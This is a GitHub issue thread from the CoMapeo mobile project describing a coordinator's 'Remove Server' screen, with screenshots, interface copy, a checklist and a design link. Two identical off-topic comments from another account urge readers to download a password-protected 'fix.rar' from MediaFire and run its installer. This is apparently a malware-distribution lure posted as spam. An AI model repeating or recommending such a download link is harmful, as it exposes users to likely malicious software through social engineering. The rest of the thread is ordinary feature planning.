### ISSUE TITLE
Coordinator / Remove Server

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#626]
**Description**
A coordinator can remove a server and go back to no servers, or add a new one

**Todo**
## Screen 1
<img width="283" alt="Screen Shot 2024-09-18 at 12 27 03 PM" src="https://github.com/user-attachments/assets/9e7c581c-25dc-44ef-8288-3d6ed72d8090">

- User clicks on **Remover Server**

## Screen 2
<img width="282" alt="Screen Shot 2024-09-18 at 12 23 42 PM" src="https://github.com/user-attachments/assets/98ba16e9-383f-4ce7-949d-77885f7f717f">

- [ ] Open bottom sheet and display as designed
- [ ] Use  copy _Remove (Server Name) from project?_
- [ ] _This will stop archiving new data for this project. Existing archived data will not be deleted._
- [ ] Add a  **Remove Archive**  button
- [ ] Add a  **Cancel**  button

Once complete, go back to Screen 1 https://github.com/digidem/comapeo-mobile/issues/621

<img width="292" alt="Screen Shot 2024-09-18 at 12 26 01 PM" src="https://github.com/user-attachments/assets/db0ba777-deeb-467a-b445-e1a19d550bf8">

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2909-1931&t=3MJwxcx0iGMHqAbR-1

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ximenabb** [comment]
updated figma link
